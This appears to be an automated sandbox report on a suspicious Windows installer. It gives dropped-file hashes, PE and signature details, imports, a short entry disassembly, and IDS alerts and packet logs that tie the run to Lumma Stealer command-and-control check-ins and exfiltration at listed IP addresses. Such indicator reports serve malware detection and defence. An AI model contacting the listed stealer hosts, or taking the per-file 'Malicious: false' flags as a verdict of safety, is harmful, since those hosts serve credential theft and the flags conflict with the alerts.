SHA-512: | 91EDBC05794A25D7B8B6D896BDDB6E7B8B175A3ECE3B01AD96DCF27A2B344D6A38E768E0A00C6131044F448BE67A066CE18A3A1264D1DB351E6592F6C2BB200E |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\ActiVe_Ver_Set-UpFilE.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 97280 |
Entropy (8bit): | 7.9983334320368815 |
Encrypted: | true |
SSDEEP: | 1536:9G7S7zyUAVMTCS2lcxIhtLVNo0QoQ3KkKUk28gXyQbeJwZ511aJvtBQxV1lsi0E6:IkGcf2UIJNuRzXxXeJU11aJVyxVYi0E6 |
MD5: | 8E79818B013611E0E14A773EC6A06FC6 |
SHA1: | F77AB0ACEE0B4C51BF6A554A5102A7F02E78E3D2 |
SHA-256: | 395CCC10DB87BC5C7DD79F7F897CC449E70BE70CB20C0982B7D41EA040283598 |
SHA-512: | BFC8B33B183828221B1938AB2019EB00B6C55D9C13DC0DF9492D2E44860E23B93AF89024FE1CD561C7C48623B0D17859B08B59F3D65BE0F6F9F4F1EA8E4DD3CD |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\ActiVe_Ver_Set-UpFilE.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 89088 |
Entropy (8bit): | 7.99784001656117 |
Encrypted: | true |
SSDEEP: | 1536:/ui6HKO+jOoywNmeIxGZuAavrDTuDY1sXbTbKaZKiJ0NCkEyIM+rPXhiqos:8HKv/ywNmeIxGZu7F1KTmaEiJQayIM+l |
MD5: | 7A029BFE59CD61DCFFFA55F8B742D841 |
SHA1: | F82AA42C407DC648F7B3D88FBA819664D172AD72 |
SHA-256: | E33CB6F432CA1FE7B7AE317A2FC761542514201E9835B2BB98D7EAB7B3BB43A7 |
SHA-512: | 036AE62461493CA65382EA2506E3DA7A8356C17BF4E90584624F6F51BB2BEA36EE73509AA4D78927ADE57506BE0488B3F53EAA5028C28248D8A0AF5F0939A373 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\extrac32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 142336 |
Entropy (8bit): | 6.667201177750712 |
Encrypted: | false |
SSDEEP: | 3072:gA3laW2UDQWf05mjccBiqXvpgF4qv+32eOyKODOSpQSAK:lloUDtf0accB3gBmmLsiS+SAK |
MD5: | 7B57F0747FFCBC6352D12F2E4F6F420A |
SHA1: | 228758F94F5531CDF2EDC5A76777D6B85B00408C |
SHA-256: | 55CAA179DB8C37F3EAAA145A36A586A9A9CBB0359E87C0797D7711C419BA6803 |
SHA-512: | D27974B6A24E5FE8DE7CF9C5FD1E2ADB911A1DA46B25001294B567CA718CFC774F5308081938C914B563070BA5361D181EDB320E01F883C446D398C380444EBC |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\extrac32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 84992 |
Entropy (8bit): | 5.032298905100753 |
Encrypted: | false |
SSDEEP: | 384:XhJ06HrpRD9HPmPuki09PrOa3HwwuBcozc/mwftIQXoSpu88888888888888888o:5D9vmPukxhSaAwuXc/mex/SGG |
MD5: | 9057C390318CFA1DDD9D6286BB8A805A |
SHA1: | FE30919FE9069E01E0D8483C7EC2C078380C8AC2 |
SHA-256: | 23C0CAD22E59A1838A557AA4AF1DDC4B727CD6171F475434BFBD6BF9069BD502 |
SHA-512: | 1D26AA3EB7F30096AD08ACCC4AA0190C142A10CCD1BF20DA870DA3541C051B0A3CDB7FCE6265FBFCB6B89EDC0FB3E6F50F4041E7977972BE825C888D60DD926B |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\extrac32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 82944 |
Entropy (8bit): | 6.067796370472707 |
Encrypted: | false |
SSDEEP: | 1536:QYfv2j62SfuVGHj1vtK7h6R8anHsWccd0vtmgMbFuz08QuklMBNI8:QC2jfTq8QLeAg0Fuz08XvBN5 |
MD5: | 1C3C56941EA2347652D7E8B21FC78343 |
SHA1: | E194E37057F0940DE764090686E0CF972F9D9496 |
SHA-256: | ACE39F0B7357D6FF14F4EA0D4EEB6BA2E88B9838E4826F9B4213C91218140738 |
SHA-512: | 90D99737E07B0B9DF208FF7F3A2AA1790679174930E74D3A3E09D00D888A6B16B02759BAA029194BED02B03E16198BDB77518BBD72E6C31A24B04543B4CCAE9C |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\extrac32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 93184 |
Entropy (8bit): | 6.324548951181394 |
Encrypted: | false |
SSDEEP: | 1536:+AD1EsdzVXnP94SGGLpRB6M28eFvMVpYhWoXElJUzdlDfFgQa8BpDzdZPp7HE4:+g5PXPeiR6MKkjGWoUlJUPdgQa8Bp/LL |
MD5: | 51DE0BD5547038D9D31F708F34390200 |
SHA1: | 969131AED62C3BB2A0C5398DF79D5E7D7588540B |
SHA-256: | 05C9F35758B75C7017A5A1AFD9C15108C832F11910A9C87F33D63148A80386A2 |
SHA-512: | 870D407B3AEDE5689AD67C8BFBD6607EE90594559E88CBCFFF0BCDE674F24E4600A8EFD1C2BC9DB003A861115CD51E0BA4BA8F819117B2CC0C735F7CEFC45E32 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\extrac32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 36077 |
Entropy (8bit): | 7.1656101447186815 |
Encrypted: | false |
SSDEEP: | 768:J9OTGQ1Dv7sMvLHfR/ZByLiFuO/ChgZ45VatJVEV3GPkjF:JATGODv7xvTphAiPChgZ2kOE6 |
MD5: | 3A13A6D858EB5A2C7F5A8AE68ED28DE3 |
SHA1: | F1FD6A4292805F8882BD35CCFF3DA7C038FC33A1 |
SHA-256: | 23376867D6E7AB3F03913A7579A544A85D5288EC66977F19871155E518C5B46F |
SHA-512: | 5168CD3F54AB31BE4A3B6F140F9A3FC6EC40F1DC1AC5C5F0E81D60EB892F96067EA4A26A685A56BA76DC48997D53BD444E0F2D5A72A93D49684E563933CF1A34 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\extrac32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 148480 |
Entropy (8bit): | 6.697215004040376 |
Encrypted: | false |
SSDEEP: | 3072:uMnVIPPBxT/sZydTmRxlHS3NxrHSBRtNPnj0nEoXnmowS2u5hVOoB:uMVIPPL/sZ7HS3zcNPj0nEo3tb2e |
MD5: | D92F2A66972B9FAA8DE548C1FCED8691 |
SHA1: | 8129A94738378FEA02A022C7E43B17BACE4DEDC8 |
SHA-256: | 34D674FCCF583E278517993629E56A8895C321CBCD0F99C1D7FBAC613D28F7A1 |
SHA-512: | E1FF6699330E4D1A93D60C0DD20184A4F5F6CF6B7B55B572699326DD75FAD10FACF695632B7D33D9F692C63AD472002E4364F932DDEF9273EB029C6E02B95A87 |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\ActiVe_Ver_Set-UpFilE.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 61834 |
Entropy (8bit): | 7.997430465004734 |
Encrypted: | true |
SSDEEP: | 1536:Xma9lqHl368oITcDN1TZ7POdvoXO/0+CV:BClqkc5DOO+Q |
MD5: | 6F304E5F2A7926D4A1A17F2CD8CC7F6F |
SHA1: | 13621FDB96F56D451CEADBAE0640D37E8863F646 |
SHA-256: | EBF9C51228A91209A8CD5680B4BA8A6497BBFCC0B602723E8772590B966ECEB2 |
SHA-512: | 2186D136C4F2A4F458C713934ABEB949642D7D7331D0C4B25CB43113FA401DAF4254042B28310A27165609FF1780B1917D92CDC83D9B4EBD530A716D810CAC29 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\extrac32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 69632 |
Entropy (8bit): | 6.55615186049024 |
Encrypted: | false |
SSDEEP: | 1536:uhjLueoMmOrrHL/uDoiouK+r5bLmbZzW9FfTubb1/Dde6YF640L6wy4Za9IN3Yk:uhnueoMmOqDoioO5bLezW9FfTut/Dde8 |
MD5: | CF54118DC56610A97CD19BA6171475CC |
SHA1: | BB6D3FB0E444651AD3D819B346E533034F3B9766 |
SHA-256: | 875974480BA6E9CA1E199A4030DD21B916F889E0B958C49C843887A5C2F2EF0A |
SHA-512: | 73948C9BBD5369F165944217B630992F560563EF9F4C7B43FEC3B4A9A5C6F12E5828E50D2B60BAE9BBBE8C80AA063500A90E1C83F9C1CDF8915000D02BED5367 |
Malicious: | false |
Preview: |
Process: | C:\Users\user\AppData\Local\Temp\686105\Challenged.com |
File Type: | |
Category: | dropped |
Size (bytes): | 16791 |
Entropy (8bit): | 4.431180163596247 |
Encrypted: | false |
SSDEEP: | 192:xSD+TD90sp7aSVbJ/CtzfWdYdKG7VhN3EpIJ5tFtQjMY5VhIJ+Ik:7azfVZ3LPQD6J7k |
MD5: | 2E59DF53309DBD234F876BAD5C73F5B4 |
SHA1: | BB243841CEA5D85A0E2849C949B9BB11CEB4FC33 |
SHA-256: | B73DF91C83960A7DCCE8F112B1F7E4DB8EC6B659D4AC706F79A1A703297533DD |
SHA-512: | 34C966EC7213CA502849BAC1BB6B18A3C4B30EC07EB8FFAA837D048ED853C15842256C6C2869F96ADBA2EB9994A85393CED0CEDC72B9A9DA8E08BB019FBB3E5A |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Users\user\AppData\Local\Temp\686105\Challenged.com |
File Type: | |
Category: | dropped |
Size (bytes): | 1835008 |
Entropy (8bit): | 4.462957636250951 |
Encrypted: | false |
SSDEEP: | 6144:1IXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uN2dwBCswSbn:2XD94+WlLZMM6YFHg+n |
MD5: | 03EF360B915F0D3FDAFB2AC09E54A1C3 |
SHA1: | 75BB1916FD29D9C98F1CFA768BF49B58D0BF88CF |
SHA-256: | 2BA8D869F0F0B3393E632C887E59648BC781B9A8D26E8BC2A26EDA459CFE2F5F |
SHA-512: | 505E03EAF47667C704A187A3718152D02839602211CDA99F9F59B9981A6729D72D3B16D4FAB9A66556DB846F97DE451ACE0AD665D23EF0282D3C1DDB2A4CE0B1 |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 7.975324843745072 |
TrID: |
|
File name: | ActiVe_Ver_Set-UpFilE.exe |
File size: | 1'087'006 bytes |
MD5: | 047187c8dc466a354acb17192de48bdd |
SHA1: | 1bf147c660bce0a5627d68e2f67c936ec38a8633 |
SHA256: | 856008a3c4234e8a1377480f8dd0a831c11e5889b04495e86d98b58a54c37463 |
SHA512: | 8aa2ee92fc73240f7cebe5c7433076a62bdf403d8b97ac6d0cbc3ec3b8b808ece418a5f836f84d5baf0b6cab44f85ddff556f3e6bad5474e0e257e5cc1d2e7a1 |
SSDEEP: | 24576:OUiOgNMUUHR4cR4/vj52mC/NqIB3X4RrBhFs:9BgW7HRb4vFq4RFhFs |
TLSH: | DE3523624FD81537D6690E719EB14661AF30B021B430988F339CEECC79D739E6E18B5A |
File Content Preview: | MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L...X|.N.................n...N...B...8..... |
Icon Hash: | 453ab6be9caadcd4 |
Entrypoint: | 0x403883 |
Entrypoint Section: | .text |
Digitally signed: | true |
Imagebase: | 0x400000 |
Subsystem: | windows gui |
Image File Characteristics: | EXECUTABLE_IMAGE, 32BIT_MACHINE |
DLL Characteristics: | DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE |
Time Stamp: | 0x4E807C58 [Mon Sep 26 13:21:28 2011 UTC] |
TLS Callbacks: | |
CLR (.Net) Version: | |
OS Version Major: | 5 |
OS Version Minor: | 0 |
File Version Major: | 5 |
File Version Minor: | 0 |
Subsystem Version Major: | 5 |
Subsystem Version Minor: | 0 |
Import Hash: | be41bf7b8cc010b614bd36bbca606973 |
Signature Valid: | false |
Signature Issuer: | CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US |
Signature Validation Error: | The digital signature of the object did not verify |
Error Number: | -2146869232 |
Not Before, Not After |
|
Subject Chain |
|
Version: | 3 |
Thumbprint MD5: | 5F1B6B6C408DB2B4D60BAA489E9A0E5A |
Thumbprint SHA-1: | 15F760D82C79D22446CC7D4806540BF632B1E104 |
Thumbprint SHA-256: | 28AF76241322F210DA473D9569EFF6F27124C4CA9F43933DA547E8D068B0A95D |
Serial: | 0997C56CAA59055394D9A9CDB8BEEB56 |
Instruction |
---|
sub esp, 000002D4h |
push ebx |
push ebp |
push esi |
push edi |
push 00000020h |
xor ebp, ebp |
pop esi |
mov dword ptr [esp+18h], ebp |
mov dword ptr [esp+10h], 00409268h |
mov dword ptr [esp+14h], ebp |
call dword ptr [00408030h] |
push 00008001h |
call dword ptr [004080B4h] |
push ebp |
call dword ptr [004082C0h] |
push 00000008h |
mov dword ptr [00472EB8h], eax |
call 00007F3458C1001Bh |
push ebp |
push 000002B4h |
mov dword ptr [00472DD0h], eax |
lea eax, dword ptr [esp+38h] |
push eax |
push ebp |
push 00409264h |
call dword ptr [00408184h] |
push 0040924Ch |
push 0046ADC0h |
call 00007F3458C0FCFDh |
call dword ptr [004080B0h] |
push eax |
mov edi, 004C30A0h |
push edi |
call 00007F3458C0FCEBh |
push ebp |
call dword ptr [00408134h] |
cmp word ptr [004C30A0h], 0022h |
mov dword ptr [00472DD8h], eax |
mov eax, edi |
jne 00007F3458C0D5EAh |
push 00000022h |
pop esi |
mov eax, 004C30A2h |
push esi |
push eax |
call 00007F3458C0F9C1h |
push eax |
call dword ptr [00408260h] |
mov esi, eax |
mov dword ptr [esp+1Ch], esi |
jmp 00007F3458C0D673h |
push 00000020h |
pop ebx |
cmp ax, bx |
jne 00007F3458C0D5EAh |
add esi, 02h |
cmp word ptr [esi], bx |
Programming Language: |
|
Name | Virtual Address | Virtual Size | Is in Section |
---|---|---|---|
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x9b34 | 0xb4 | .rdata |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xf4000 | 0x88be | .rsrc |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x106ff6 | 0x2628 | |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x7a000 | 0x964 | .ndata |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2d0 | .rdata |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
---|---|---|---|---|---|---|---|---|---|
.text | 0x1000 | 0x6dae | 0x6e00 | 00499a6f70259150109c809d6aa0e6ed | False | 0.6611150568181818 | data | 6.508529563136936 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
.rdata | 0x8000 | 0x2a62 | 0x2c00 | 07990aaa54c3bc638bb87a87f3fb13e3 | False | 0.3526278409090909 | data | 4.390535020989255 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.data | 0xb000 | 0x67ebc | 0x200 | 014871d9a00f0e0c8c2a7cd25606c453 | False | 0.203125 | data | 1.4308602597540492 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.ndata | 0x73000 | 0x81000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.rsrc | 0xf4000 | 0x88be | 0x8a00 | ded1fad5caf990fb2f1c7e69689f8b2a | False | 0.8372112771739131 | data | 7.300835270298571 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.reloc | 0xfd000 | 0xf32 | 0x1000 | f3c1d9ac285d02105c27f652468d8316 | False | 0.59912109375 | data | 5.510924549464477 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
---|---|---|---|---|---|---|
RT_ICON | 0xf41c0 | 0x5b1f | PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced | English | United States | 1.0006859004586959 |
RT_ICON | 0xf9ce0 | 0x2668 | Device independent bitmap graphic, 48 x 96 x 32, image size 9792 | English | United States | 0.5107811228641171 |
RT_DIALOG | 0xfc348 | 0x100 | data | English | United States | 0.5234375 |
RT_DIALOG | 0xfc448 | 0x11c | data | English | United States | 0.6056338028169014 |
RT_DIALOG | 0xfc564 | 0x60 | data | English | United States | 0.7291666666666666 |
RT_GROUP_ICON | 0xfc5c4 | 0x22 | data | English | United States | 0.9705882352941176 |
RT_MANIFEST | 0xfc5e8 | 0x2d6 | XML 1.0 document, ASCII text, with very long lines (726), with no line terminators | English | United States | 0.5647382920110193 |
DLL | Import |
---|---|
KERNEL32.dll | SetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW |
USER32.dll | GetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW |
GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject |
SHELL32.dll | SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation |
ADVAPI32.dll | RegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW |
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create |
ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance |
VERSION.dll | GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW |
Language of compilation system | Country where language is spoken | Map |
---|---|---|
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-15T15:53:43.715548+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49739 | 172.67.192.161 | 443 | TCP |
2025-01-15T15:53:44.290831+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49739 | 172.67.192.161 | 443 | TCP |
2025-01-15T15:53:44.290831+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49739 | 172.67.192.161 | 443 | TCP |
2025-01-15T15:53:45.033257+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49740 | 172.67.192.161 | 443 | TCP |
2025-01-15T15:53:45.540209+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.4 | 49740 | 172.67.192.161 | 443 | TCP |
2025-01-15T15:53:45.540209+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49740 | 172.67.192.161 | 443 | TCP |
2025-01-15T15:53:46.808753+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49741 | 172.67.192.161 | 443 | TCP |
2025-01-15T15:53:48.265620+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49742 | 172.67.192.161 | 443 | TCP |
2025-01-15T15:53:49.926321+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49743 | 172.67.192.161 | 443 | TCP |
2025-01-15T15:53:51.924723+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49744 | 172.67.192.161 | 443 | TCP |
2025-01-15T15:53:52.409824+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.4 | 49744 | 172.67.192.161 | 443 | TCP |
2025-01-15T15:53:53.027692+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49745 | 172.67.192.161 | 443 | TCP |
2025-01-15T15:53:54.272684+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49746 | 172.67.192.161 | 443 | TCP |
2025-01-15T15:53:56.533823+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49747 | 172.67.192.161 | 443 | TCP |
2025-01-15T15:53:56.909493+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49747 | 172.67.192.161 | 443 | TCP |
2025-01-15T15:53:57.681104+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49748 | 185.161.251.21 | 443 | TCP |
2025-01-15T15:53:58.609414+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49749 | 104.21.15.122 | 443 | TCP |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jan 15, 2025 15:53:43.227056980 CET | 49739 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:43.227103949 CET | 443 | 49739 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:43.227217913 CET | 49739 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:43.230623960 CET | 49739 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:43.230643034 CET | 443 | 49739 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:43.715440035 CET | 443 | 49739 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:43.715548038 CET | 49739 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:43.721668959 CET | 49739 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:43.721679926 CET | 443 | 49739 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:43.721981049 CET | 443 | 49739 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:43.773633003 CET | 49739 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:43.842792034 CET | 49739 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:43.842792034 CET | 49739 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:43.842916965 CET | 443 | 49739 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:44.290760994 CET | 443 | 49739 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:44.290993929 CET | 443 | 49739 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:44.291055918 CET | 49739 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:44.292280912 CET | 49739 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:44.292315960 CET | 443 | 49739 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:44.292330027 CET | 49739 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:44.292340994 CET | 443 | 49739 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:44.297945976 CET | 49740 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:44.298016071 CET | 443 | 49740 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:44.298098087 CET | 49740 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:44.298980951 CET | 49740 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:44.299000978 CET | 443 | 49740 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:45.033168077 CET | 443 | 49740 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:45.033257008 CET | 49740 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:45.034670115 CET | 49740 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:45.034682989 CET | 443 | 49740 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:45.034982920 CET | 443 | 49740 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:45.036290884 CET | 49740 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:45.036322117 CET | 49740 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:45.036365032 CET | 443 | 49740 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:45.540301085 CET | 443 | 49740 | 172.67.192.161 | 192.168.2.4 |
